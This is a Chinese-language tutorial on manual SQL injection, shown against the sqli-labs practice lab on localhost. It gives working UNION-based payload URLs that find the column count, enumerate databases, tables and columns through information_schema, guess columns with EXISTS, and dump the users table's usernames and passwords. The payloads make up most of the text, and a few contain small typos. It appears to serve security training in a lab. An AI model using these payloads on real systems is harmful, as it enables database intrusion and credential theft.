sql注入实例详解（二）

前言

这篇文章就是一个最基本的SQl手工注入的过程了。基本上在sqlilabs上面的实验，如果知道了其中的全部知识点，都可以通过以下的步骤进行脱裤。下面的这个步骤也是其他的脱裤手段的基础。如果想要精通SQL注入，那么这个最基本的脱裤步骤是必须了解和掌握的。

为了方便说明，我们还是用之前的数字型的注入点为例来进行说明。

整体步骤：

　　1. 判断是不是注入点

　　2.得到字段总数

　　3.得到显示位

　　4.查选库

　　5.查选表名

　　6.查选列名

　　7.脱裤（就是得到我们想得到列名的值）

1. 判断是不是注入点

 　　SQL注入漏洞的几种判断方法

①http://localhost/sqlilabs/Less-2/?id=1id'

②http://localhost/sqlilabs/Less-2/?id=1id and 1=1

③http://localhost/sqlilabs/Less-2/?id=1id and 1=2

如果执行①后，页面上提示报错或者提示数据库错误的话，说明是存在注入漏洞的。

如果执行②后，页面正常显示，而执行③后，页面报错，那么说明这个页面是存在注入漏洞的。

就说明http://localhost/sqlilabs/Less-2/?id=1id

2.得到字段总数

　　♦后台的SQL语句的写法大致为：

select username,password,[....] from table where id=userinput

　　♦那么我们通过使用order by的语句来判断select所查询字段的数目。

那么payload变为：

http://localhost/sqlilabs/Less-2/?id=1 order by 1/2/3/4....

当使用order by 4时程序出错，那么select的字段一共是3个。

3.得到显示位

　　♦在页面上会显示从select中选取的字段，我们接下来就是要判断显示的字段是哪几个字段。

　　使用如下的payload(两者均可)进行判断。

http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,3
http://localhost/sqlilabs/Less-2/?id=1 and 1=2 union select 1,2,3

当使用个如上的payload时，页面的显示如下：

通过如上的页面显示就可以知道，页面中显示的是第2位和第3位的信息。

4.查选库

　　♦在知道了显示位之后，那么接下来就可以通过显示位来显示我们想知道的信息，如数据库的版本，用户信息等等。那么我们使用如下的payload就可以知道相关的信息。

http://localhost/sqlilabs/Less-2/?id=-1 union select 1,version(),database()

此时页面的显示为：

那么接下来我们通过这种方式知道数据库中所有的数据库的名称。

payload如下：

http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,SCHEMA_NAME, from information_schema.SCHEMATA limit 0,1 #得到第一个库名
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,SCHEMA_NAME, from information_schema.SCHEMATA limit 1,1 #得到第二个库名
...

5.查选表名

　　♦由于database()返回的就是当前web程序所使用的数据库名，那么我们就利用database()来查询所有的表信息。当然在上一步中。我们也已经知道当前的database就是security。

那么我们构造的payload如下：

http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()

这样我们就得到当前数据库下所有的表名了。页面返回的结果是：

所以我们知道在当前的数据库中存在4张表，分别是emails,referers,uagents,users。

6.查选列名

　　♦在知道了表名之后，接下来我们利用information_schema.columns就可以根据表名来获取当前表中所有的字段。

payload如下：

http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273(users的十六进制)

页面的显示结果如下：

通过这个语句，我们就知道在users表中存在USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password,id,name,password这些字段。但是我本地测试的测试的时候，这个存在一个问题，实际上在security数据库的users的表中，只有id,username,password这3个字段，其他的字段都是其他数据库的中users表的字段名。

通过上面的payload，我们也同样可以知道在emails,referers,uagents中的字段名称。

但是有的时候后台的代码可能仅用了使用where子句，那么这个时候就无法通过information_schema.coumns来得到列名了，这个时候只能够根据你自己多年的黑客经验来进行猜解了。猜解的方法也是比较的简单，使用exists子句就可以进行猜解了。假设在我们已经知道了表名的情况下(当然猜解表名也使用通过exists子句来完成)。

猜解的语句如下:

http://localhost/sqlilabs/Less-2/?id=1 and exists(select uname from users)

主要的语句就是exists(select 需要猜解的列名 from users)这种句式。如果在users表中不存在uname列名，则页面不会显示内容或者是直接出现sql的错误语句。

如下如所示：

下面这个就是猜解到了users表中存在的字段。

http://localhost/sqlilabs/Less-2/?id=1 and exists(select username from users)

猜测在users表中存在username列，上面的语句程序可以正常第返回结果，那么寿命在users表中确实存在username列名。

7.脱裤（就是得到我们想得到列名的值）

在知道了当前数据库所有的表名和字段名之后，接下来我们就可以dump数据库中所有的信息了。比如我们下载当前users表中所有的数据。

可以使用如下的payload：

http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(username,password),3 from users

就可以得到users表中所有的username和password的数据了，通过这种方式也能够得到其他表中的数据了。

总结：这就是sql注入的原理，但是你必须知道：

　　1.mysql的系统函数

　　2.了解下union

　　3.order by 用于对结果集进行排序

　　4.mysql数据库重要四个数据库库：information_schema proformation_schema mysql test

　　5.三个重要数据表：table_name table_schema table_type

　　6.理解schema,schemata,schema_name,table_schema的含义很重要！很重要！很重要！（说三遍~）

 这些我会在下来写一下。